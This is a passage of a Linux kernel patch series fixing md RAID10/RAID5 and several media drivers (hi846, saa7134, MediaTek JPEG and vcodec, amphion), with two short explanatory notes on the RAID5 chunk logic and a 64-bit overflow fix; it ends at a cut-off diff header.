+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+@@ -4283,10 +4304,7 @@ static int raid10_run(struct mddev *mddev)
+ 
+ out_free_conf:
+ 	md_unregister_thread(&mddev->thread);
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf);
++	raid10_free_conf(conf);
+ 	mddev->private = NULL;
+ out:
+ 	return -EIO;
+@@ -4294,15 +4312,7 @@ out:
+ 
+ static void raid10_free(struct mddev *mddev, void *priv)
+ {
+-	struct r10conf *conf = priv;
+-
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf->mirrors_old);
+-	kfree(conf->mirrors_new);
+-	bioset_exit(&conf->bio_split);
+-	kfree(conf);
++	raid10_free_conf(priv);
+ }
+ 
+ static void raid10_quiesce(struct mddev *mddev, int quiesce)
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 7b820b81d8c2b..f787c9e5b10e7 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -6079,6 +6079,38 @@ out_release:
+ 	return ret;
+ }
+ 
++/*
++ * If the bio covers multiple data disks, find the sector within the bio that
++ * has the lowest chunk offset in the first chunk.
++ */
++static sector_t raid5_bio_lowest_chunk_sector(struct r5conf *conf,
++					      struct bio *bi)
++{
++	int sectors_per_chunk = conf->chunk_sectors;
++	int raid_disks = conf->raid_disks;
++	int dd_idx;
++	struct stripe_head sh;
++	unsigned int chunk_offset;
++	sector_t r_sector = bi->bi_iter.bi_sector & ~((sector_t)RAID5_STRIPE_SECTORS(conf)-1);
++	sector_t sector;
++
++	/* We pass in fake stripe_head to get back parity disk numbers */
++	sector = raid5_compute_sector(conf, r_sector, 0, &dd_idx, &sh);
++	chunk_offset = sector_div(sector, sectors_per_chunk);
++	if (sectors_per_chunk - chunk_offset >= bio_sectors(bi))
++		return r_sector;
++	/*
++	 * Bio crosses to the next data disk. Check whether it's in the same
++	 * chunk.
++	 */
++	dd_idx++;
++	while (dd_idx == sh.pd_idx || dd_idx == sh.qd_idx)
++		dd_idx++;
++	if (dd_idx >= raid_disks)
++		return r_sector;
++	return r_sector + sectors_per_chunk - chunk_offset;
++}
++
+ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ {
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+@@ -6150,6 +6182,17 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 	}
+ 	md_account_bio(mddev, &bi);
+ 
++	/*
++	 * Lets start with the stripe with the lowest chunk offset in the first
++	 * chunk. That has the best chances of creating IOs adjacent to
++	 * previous IOs in case of sequential IO and thus creates the most
++	 * sequential IO pattern. We don't bother with the optimization when
++	 * reshaping as the performance benefit is not worth the complexity.
++	 */
++	if (likely(conf->reshape_progress == MaxSector))
++		logical_sector = raid5_bio_lowest_chunk_sector(conf, bi);
++	s = (logical_sector - ctx.first_sector) >> RAID5_STRIPE_SHIFT(conf);
++
+ 	add_wait_queue(&conf->wait_for_overlap, &wait);
+ 	while (1) {
+ 		res = make_stripe_request(mddev, conf, &ctx, logical_sector,
+@@ -6178,7 +6221,7 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 			continue;
+ 		}
+ 
+-		s = find_first_bit(ctx.sectors_to_do, stripe_cnt);
++		s = find_next_bit_wrap(ctx.sectors_to_do, stripe_cnt, s);
+ 		if (s == stripe_cnt)
+ 			break;
+ 
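A worked instance of raid5_bio_lowest_chunk_sector() may help (numbers are illustrative): with 64 KiB chunks, sectors_per_chunk = 128, and a bio whose stripe-aligned start sits 32 sectors into its chunk, sector_div() yields chunk_offset = 32. If the bio spans 200 sectors, then 128 - 32 = 96 < 200, so it crosses into the next data disk and the function returns

	r_sector + sectors_per_chunk - chunk_offset  =  r_sector + 96

which is the sector at offset 0 of the next disk's chunk. Starting there, and resuming the bitmap walk with find_next_bit_wrap() from that position rather than from bit 0, makes successive stripe requests hit adjacent disk offsets for sequential IO.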
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index 7c61873b71981..306dc35e925fd 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -1472,21 +1472,26 @@ static int hi846_init_controls(struct hi846 *hi846)
+ 	if (ctrl_hdlr->error) {
+ 		dev_err(&client->dev, "v4l ctrl handler error: %d\n",
+ 			ctrl_hdlr->error);
+-		return ctrl_hdlr->error;
++		ret = ctrl_hdlr->error;
++		goto error;
+ 	}
+ 
+ 	ret = v4l2_fwnode_device_parse(&client->dev, &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	ret = v4l2_ctrl_new_fwnode_properties(ctrl_hdlr, &hi846_ctrl_ops,
+ 					      &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hi846->sd.ctrl_handler = ctrl_hdlr;
+ 
+ 	return 0;
++
++error:
++	v4l2_ctrl_handler_free(ctrl_hdlr);
++	return ret;
+ }
+ 
+ static int hi846_set_video_mode(struct hi846 *hi846, int fps)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index d034a67042e35..892cd97b7cab7 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -941,6 +941,7 @@ err_async:
+ static void max9286_v4l2_unregister(struct max9286_priv *priv)
+ {
+ 	fwnode_handle_put(priv->sd.fwnode);
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	v4l2_async_unregister_subdev(&priv->sd);
+ 	max9286_v4l2_notifier_unregister(priv);
+ }
+diff --git a/drivers/media/i2c/ov8856.c b/drivers/media/i2c/ov8856.c
+index cf8384e09413b..b5c7881383ca7 100644
+--- a/drivers/media/i2c/ov8856.c
++++ b/drivers/media/i2c/ov8856.c
+@@ -1709,46 +1709,6 @@ static int ov8856_identify_module(struct ov8856 *ov8856)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STREAMING);
+-	if (ret)
+-		return ret;
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_MODE_CTRL,
+-			       OV8856_REG_VALUE_08BIT, OV8856_OTP_MODE_AUTO);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to set otp mode");
+-		return ret;
+-	}
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_LOAD_CTRL,
+-			       OV8856_REG_VALUE_08BIT,
+-			       OV8856_OTP_LOAD_CTRL_ENABLE);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to enable load control");
+-		return ret;
+-	}
+-
+-	ret = ov8856_read_reg(ov8856, OV8856_MODULE_REVISION,
+-			      OV8856_REG_VALUE_08BIT, &val);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to read module revision");
+-		return ret;
+-	}
+-
+-	dev_info(&client->dev, "OV8856 revision %x (%s) at address 0x%02x\n",
+-		 val,
+-		 val == OV8856_2A_MODULE ? "2A" :
+-		 val == OV8856_1B_MODULE ? "1B" : "unknown revision",
+-		 client->addr);
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STANDBY);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to exit streaming mode");
+-		return ret;
+-	}
+-
+ 	ov8856->identified = true;
+ 
+ 	return 0;
+diff --git a/drivers/media/pci/dm1105/dm1105.c b/drivers/media/pci/dm1105/dm1105.c
+index 4ac645a56c14e..9e9c7c071accc 100644
+--- a/drivers/media/pci/dm1105/dm1105.c
++++ b/drivers/media/pci/dm1105/dm1105.c
+@@ -1176,6 +1176,7 @@ static void dm1105_remove(struct pci_dev *pdev)
+ 	struct dvb_demux *dvbdemux = &dev->demux;
+ 	struct dmx_demux *dmx = &dvbdemux->dmx;
+ 
++	cancel_work_sync(&dev->ir.work);
+ 	dm1105_ir_exit(dev);
+ 	dmx->close(dmx);
+ 	dvb_net_release(&dev->dvbnet);
+diff --git a/drivers/media/pci/saa7134/saa7134-ts.c b/drivers/media/pci/saa7134/saa7134-ts.c
+index 6a5053126237f..437dbe5e75e29 100644
+--- a/drivers/media/pci/saa7134/saa7134-ts.c
++++ b/drivers/media/pci/saa7134/saa7134-ts.c
+@@ -300,6 +300,7 @@ int saa7134_ts_start(struct saa7134_dev *dev)
+ 
+ int saa7134_ts_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->ts_q.timeout);
+ 	saa7134_pgtable_free(dev->pci, &dev->ts_q.pt);
+ 	return 0;
+ }
+diff --git a/drivers/media/pci/saa7134/saa7134-vbi.c b/drivers/media/pci/saa7134/saa7134-vbi.c
+index 3f0b0933eed69..3e773690468bd 100644
+--- a/drivers/media/pci/saa7134/saa7134-vbi.c
++++ b/drivers/media/pci/saa7134/saa7134-vbi.c
+@@ -185,6 +185,7 @@ int saa7134_vbi_init1(struct saa7134_dev *dev)
+ int saa7134_vbi_fini(struct saa7134_dev *dev)
+ {
+ 	/* nothing */
++	del_timer_sync(&dev->vbi_q.timeout);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/pci/saa7134/saa7134-video.c b/drivers/media/pci/saa7134/saa7134-video.c
+index 4d8974c9fcc98..29124756a62bc 100644
+--- a/drivers/media/pci/saa7134/saa7134-video.c
++++ b/drivers/media/pci/saa7134/saa7134-video.c
+@@ -2146,6 +2146,7 @@ int saa7134_video_init1(struct saa7134_dev *dev)
+ 
+ void saa7134_video_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->video_q.timeout);
+ 	/* free stuff */
+ 	saa7134_pgtable_free(dev->pci, &dev->video_q.pt);
+ 	saa7134_pgtable_free(dev->pci, &dev->vbi_q.pt);
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index 87f9f8e90ab13..70633530d23a1 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -168,7 +168,31 @@ static const struct vpu_format vdec_formats[] = {
+ 	{0, 0, 0, 0},
+ };
+ 
++static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
++{
++	struct vpu_inst *inst = ctrl_to_inst(ctrl);
++	struct vdec_t *vdec = inst->priv;
++	int ret = 0;
++
++	vpu_inst_lock(inst);
++	switch (ctrl->id) {
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE:
++		vdec->params.display_delay_enable = ctrl->val;
++		break;
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY:
++		vdec->params.display_delay = ctrl->val;
++		break;
++	default:
++		ret = -EINVAL;
++		break;
++	}
++	vpu_inst_unlock(inst);
++
++	return ret;
++}
++
+ static const struct v4l2_ctrl_ops vdec_ctrl_ops = {
++	.s_ctrl = vdec_op_s_ctrl,
+ 	.g_volatile_ctrl = vpu_helper_g_volatile_ctrl,
+ };
+ 
+@@ -181,6 +205,14 @@ static int vdec_ctrl_init(struct vpu_inst *inst)
+ 	if (ret)
+ 		return ret;
+ 
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY,
++			  0, 0, 1, 0);
++
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE,
++			  0, 1, 1, 0);
++
+ 	ctrl = v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
+ 				 V4L2_CID_MIN_BUFFERS_FOR_CAPTURE, 1, 32, 1, 2);
+ 	if (ctrl)
+diff --git a/drivers/media/platform/amphion/vpu_codec.h b/drivers/media/platform/amphion/vpu_codec.h
+index 528a93f08ecd4..bac6d0d94f8a5 100644
+--- a/drivers/media/platform/amphion/vpu_codec.h
++++ b/drivers/media/platform/amphion/vpu_codec.h
+@@ -55,7 +55,8 @@ struct vpu_encode_params {
+ struct vpu_decode_params {
+ 	u32 codec_format;
+ 	u32 output_format;
+-	u32 b_dis_reorder;
++	u32 display_delay_enable;
++	u32 display_delay;
+ 	u32 b_non_frame;
+ 	u32 frame_count;
+ 	u32 end_flag;
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index 2c9bfc6a5a72e..feb5c25e31044 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -641,7 +641,9 @@ static int vpu_malone_set_params(struct vpu_shared_addr *shared,
+ 		hc->jpg[instance].jpg_mjpeg_interlaced = 0;
+ 	}
+ 
+-	hc->codec_param[instance].disp_imm = params->b_dis_reorder ? 1 : 0;
++	hc->codec_param[instance].disp_imm = params->display_delay_enable ? 1 : 0;
++	if (malone_format != MALONE_FMT_AVC)
++		hc->codec_param[instance].disp_imm = 0;
+ 	hc->codec_param[instance].dbglog_enable = 0;
+ 	iface->dbglog_desc.level = 0;
+ 
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index 969516a940ba7..d9584fe5033eb 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -1025,9 +1025,6 @@ retry_select:
+ 	if (!dst_buf)
+ 		goto getbuf_fail;
+ 
+-	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
+-	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
+-
+ 	v4l2_m2m_buf_copy_metadata(src_buf, dst_buf, true);
+ 
+ 	mtk_jpegenc_set_hw_param(ctx, hw_id, src_buf, dst_buf);
+@@ -1045,6 +1042,9 @@ retry_select:
+ 		goto enc_end;
+ 	}
+ 
++	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
++	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
++
+ 	schedule_delayed_work(&comp_jpeg[hw_id]->job_timeout_work,
+ 			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
+ 
+@@ -1220,9 +1220,6 @@ retry_select:
+ 	if (!dst_buf)
+ 		goto getbuf_fail;
+ 
+-	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
+-	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
+-
+ 	v4l2_m2m_buf_copy_metadata(src_buf, dst_buf, true);
+ 	jpeg_src_buf = mtk_jpeg_vb2_to_srcbuf(&src_buf->vb2_buf);
+ 	jpeg_dst_buf = mtk_jpeg_vb2_to_srcbuf(&dst_buf->vb2_buf);
+@@ -1231,7 +1228,7 @@ retry_select:
+ 					     &jpeg_src_buf->dec_param)) {
+ 		mtk_jpeg_queue_src_chg_event(ctx);
+ 		ctx->state = MTK_JPEG_SOURCE_CHANGE;
+-		goto dec_end;
++		goto getbuf_fail;
+ 	}
+ 
+ 	jpeg_src_buf->curr_ctx = ctx;
+@@ -1254,6 +1251,9 @@ retry_select:
+ 		goto clk_end;
+ 	}
+ 
++	v4l2_m2m_src_buf_remove(ctx->fh.m2m_ctx);
++	v4l2_m2m_dst_buf_remove(ctx->fh.m2m_ctx);
++
+ 	schedule_delayed_work(&comp_jpeg[hw_id]->job_timeout_work,
+ 			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
+ 
+@@ -1692,7 +1692,7 @@ static int mtk_jpeg_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (list_empty(&pdev->dev.devres_head)) {
++	if (!jpeg->variant->multi_core) {
+ 		INIT_DELAYED_WORK(&jpeg->job_timeout_work,
+ 				  mtk_jpeg_job_timeout_work);
+ 
+@@ -1874,6 +1874,7 @@ static const struct mtk_jpeg_variant mtk_jpeg_drvdata = {
+ 	.ioctl_ops = &mtk_jpeg_enc_ioctl_ops,
+ 	.out_q_default_fourcc = V4L2_PIX_FMT_YUYV,
+ 	.cap_q_default_fourcc = V4L2_PIX_FMT_JPEG,
++	.multi_core = false,
+ };
+ 
+ static struct mtk_jpeg_variant mtk8195_jpegenc_drvdata = {
+@@ -1885,6 +1886,7 @@ static struct mtk_jpeg_variant mtk8195_jpegenc_drvdata = {
+ 	.ioctl_ops = &mtk_jpeg_enc_ioctl_ops,
+ 	.out_q_default_fourcc = V4L2_PIX_FMT_YUYV,
+ 	.cap_q_default_fourcc = V4L2_PIX_FMT_JPEG,
++	.multi_core = true,
+ };
+ 
+ static const struct mtk_jpeg_variant mtk8195_jpegdec_drvdata = {
+@@ -1896,6 +1898,7 @@ static const struct mtk_jpeg_variant mtk8195_jpegdec_drvdata = {
+ 	.ioctl_ops = &mtk_jpeg_dec_ioctl_ops,
+ 	.out_q_default_fourcc = V4L2_PIX_FMT_JPEG,
+ 	.cap_q_default_fourcc = V4L2_PIX_FMT_YUV420M,
++	.multi_core = true,
+ };
+ 
+ #if defined(CONFIG_OF)
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h
+index b9126476be8fa..f87358cc9f47f 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.h
+@@ -60,6 +60,7 @@ enum mtk_jpeg_ctx_state {
+  * @ioctl_ops:			the callback of jpeg v4l2_ioctl_ops
+  * @out_q_default_fourcc:	output queue default fourcc
+  * @cap_q_default_fourcc:	capture queue default fourcc
++ * @multi_core:		whether the jpeg hw is multi_core or not
+  */
+ struct mtk_jpeg_variant {
+ 	struct clk_bulk_data *clks;
+@@ -74,6 +75,7 @@ struct mtk_jpeg_variant {
+ 	const struct v4l2_ioctl_ops *ioctl_ops;
+ 	u32 out_q_default_fourcc;
+ 	u32 cap_q_default_fourcc;
++	bool multi_core;
+ };
+ 
+ struct mtk_jpeg_src_buf {
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+index 1bbb712d78d0e..867f4c1a09fa6 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+@@ -286,10 +286,6 @@ static irqreturn_t mtk_jpegenc_hw_irq_handler(int irq, void *priv)
+ 	mtk_jpegenc_put_buf(jpeg);
+ 	pm_runtime_put(ctx->jpeg->dev);
+ 	clk_disable_unprepare(jpeg->venc_clk.clks->clk);
+-	if (!list_empty(&ctx->fh.m2m_ctx->out_q_ctx.rdy_queue) ||
+-	    !list_empty(&ctx->fh.m2m_ctx->cap_q_ctx.rdy_queue)) {
+-		queue_work(master_jpeg->workqueue, &ctx->jpeg_work);
+-	}
+ 
+ 	jpeg->hw_state = MTK_JPEG_HW_IDLE;
+ 	wake_up(&master_jpeg->enc_hw_wq);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+index 5f74ea3b7a524..8612a48bde10f 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+@@ -566,7 +566,11 @@ static int mdp_m2m_open(struct file *file)
+ 		goto err_free_ctx;
+ 	}
+ 
+-	ctx->id = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	ret = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	if (ret < 0)
++		goto err_unlock_mutex;
++	ctx->id = ret;
++
+ 	ctx->mdp_dev = mdp;
+ 
+ 	v4l2_fh_init(&ctx->fh, vdev);
+@@ -617,6 +621,8 @@ err_release_handler:
+ 	v4l2_fh_del(&ctx->fh);
+ err_exit_fh:
+ 	v4l2_fh_exit(&ctx->fh);
++	ida_free(&mdp->mdp_ida, ctx->id);
++err_unlock_mutex:
+ 	mutex_unlock(&mdp->m2m_lock);
+ err_free_ctx:
+ 	kfree(ctx);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+index 4e84a37ecdfc1..36336d169bd91 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+@@ -4,6 +4,7 @@
+  * Author: Ping-Hsun Wu <ping-hsun.wu@mediatek.com>
+  */
+ 
++#include <linux/math64.h>
+ #include <media/v4l2-common.h>
+ #include <media/videobuf2-v4l2.h>
+ #include <media/videobuf2-dma-contig.h>
+@@ -428,14 +429,15 @@ const struct mdp_format *mdp_try_fmt_mplane(struct v4l2_format *f,
+ 		u32 bpl = pix_mp->plane_fmt[i].bytesperline;
+ 		u32 min_si, max_si;
+ 		u32 si = pix_mp->plane_fmt[i].sizeimage;
++		u64 di;
+ 
+ 		bpl = clamp(bpl, min_bpl, max_bpl);
+ 		pix_mp->plane_fmt[i].bytesperline = bpl;
+ 
+-		min_si = (bpl * pix_mp->height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
+-		max_si = (bpl * s.max_height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
++		di = (u64)bpl * pix_mp->height * fmt->depth[i];
++		min_si = (u32)div_u64(di, fmt->row_depth[i]);
++		di = (u64)bpl * s.max_height * fmt->depth[i];
++		max_si = (u32)div_u64(di, fmt->row_depth[i]);
+ 
+ 		si = clamp(si, min_si, max_si);
+ 		pix_mp->plane_fmt[i].sizeimage = si;
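Two problems are fixed in one move: the 32-bit product bpl * height * depth can wrap for large frames, and a plain '/' on a u64 is unavailable on 32-bit kernels, which is why the widened intermediate is divided with div_u64(). An illustrative overflow case (hypothetical values):

	u32 bpl = 32768, height = 16384, depth = 12, row_depth = 8, si;
	u64 di;

	/* 32768 * 16384 * 12 = 6,442,450,944 -- wraps a u32 */
	di = (u64)bpl * height * depth;		/* exact in 64 bits */
	si = (u32)div_u64(di, row_depth);	/* 805,306,368 */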
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+index 641f533c417fd..c99705681a03e 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+@@ -39,10 +39,9 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ {
+ 	const struct mtk_vcodec_dec_pdata *dec_pdata = ctx->dev->vdec_pdata;
+ 	const struct mtk_video_fmt *fmt;
+-	struct mtk_q_data *q_data;
+ 	int num_frame_count = 0, i;
+-	bool ret = true;
+ 
++	fmt = &dec_pdata->vdec_formats[format_index];
+ 	for (i = 0; i < *dec_pdata->num_formats; i++) {
+ 		if (dec_pdata->vdec_formats[i].type != MTK_FMT_FRAME)
+ 			continue;
+@@ -50,27 +49,10 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ 		num_frame_count++;
+ 	}
+ 
+-	if (num_frame_count == 1)
++	if (num_frame_count == 1 || fmt->fourcc == V4L2_PIX_FMT_MM21)
+ 		return true;
+ 
+-	fmt = &dec_pdata->vdec_formats[format_index];
+-	q_data = &ctx->q_data[MTK_Q_DATA_SRC];
+-	switch (q_data->fmt->fourcc) {
+-	case V4L2_PIX_FMT_VP8_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = true;
+-		break;
+-	case V4L2_PIX_FMT_H264_SLICE:
+-	case V4L2_PIX_FMT_VP9_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = false;
+-		break;
+-	default:
+-		ret = true;
+-		break;
+-	}
+-
+-	return ret;
++	return false;
+ }
+ 
+ static struct mtk_q_data *mtk_vdec_get_q_data(struct mtk_vcodec_ctx *ctx,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+index 174a6eec2f549..42df901e8beb4 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+@@ -451,7 +451,8 @@ err_core_workq:
+ 	if (IS_VDEC_LAT_ARCH(dev->vdec_pdata->hw_arch))
+ 		destroy_workqueue(dev->core_workqueue);
+ err_res:
+-	pm_runtime_disable(dev->pm.dev);
++	if (!dev->vdec_pdata->is_subdev_supported)
++		pm_runtime_disable(dev->pm.dev);
+ err_dec_pm:
+ 	mtk_vcodec_fw_release(dev->fw_handler);
+ 	return ret;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+index 376db0e433d75..b753bf54ebd90 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+@@ -193,8 +193,16 @@ err:
+ 	return ret;
+ }
+ 
++static int mtk_vdec_hw_remove(struct platform_device *pdev)
++{
++	pm_runtime_disable(&pdev->dev);
++
++	return 0;
++}
++
+ static struct platform_driver mtk_vdec_driver = {
+ 	.probe	= mtk_vdec_hw_probe,
++	.remove = mtk_vdec_hw_remove,
+ 	.driver	= {
+ 		.name	= "mtk-vdec-comp",
+ 		.of_match_table = mtk_vdec_hw_match,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+index 035c86e7809fd..29991551cf614 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+@@ -11,7 +11,7 @@
+ #include "mtk_vcodec_dec_pm.h"
+ #include "vdec_drv_if.h"
+ 
+-static const struct mtk_video_fmt mtk_video_formats[] = {
++static struct mtk_video_fmt mtk_video_formats[] = {
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_H264,
+ 		.type = MTK_FMT_DEC,
+@@ -580,6 +580,16 @@ static int mtk_vcodec_dec_ctrls_setup(struct mtk_vcodec_ctx *ctx)
+ 
+ static void mtk_init_vdec_params(struct mtk_vcodec_ctx *ctx)
+ {
++	unsigned int i;
++
++	if (!(ctx->dev->dec_capability & VCODEC_CAPABILITY_4K_DISABLED)) {
++		for (i = 0; i < num_supported_formats; i++) {
++			mtk_video_formats[i].frmsize.max_width =
++				VCODEC_DEC_4K_CODED_WIDTH;
++			mtk_video_formats[i].frmsize.max_height =
++				VCODEC_DEC_4K_CODED_HEIGHT;
++		}
++	}
+ }
+ 
+ static struct vb2_ops mtk_vdec_frame_vb2_ops = {
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+index ffbcee04dc26f..3000db975e5f5 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+@@ -258,8 +258,10 @@ static void mtk_vdec_worker(struct work_struct *work)
+ 		if (src_buf_req)
+ 			v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+ 	} else {
+-		v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
+-		v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		if (ret != -EAGAIN) {
++			v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
++			v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		}
+ 		v4l2_m2m_job_finish(dev->m2m_dev_dec, ctx->m2m_ctx);
+ 	}
+ }
+@@ -390,14 +392,14 @@ static void mtk_vcodec_get_supported_formats(struct mtk_vcodec_ctx *ctx)
+ 	if (num_formats)
+ 		return;
+ 
+-	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
+-		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
+-		cap_format_count++;
+-	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MT21C) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_MT21C, ctx);
+ 		cap_format_count++;
+ 	}
++	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
++		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
++		cap_format_count++;
++	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_H264_SLICE) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_H264_SLICE, ctx);
+ 		out_format_count++;
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+index 955b2d0c8f53f..999ce7ee5fdc2 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
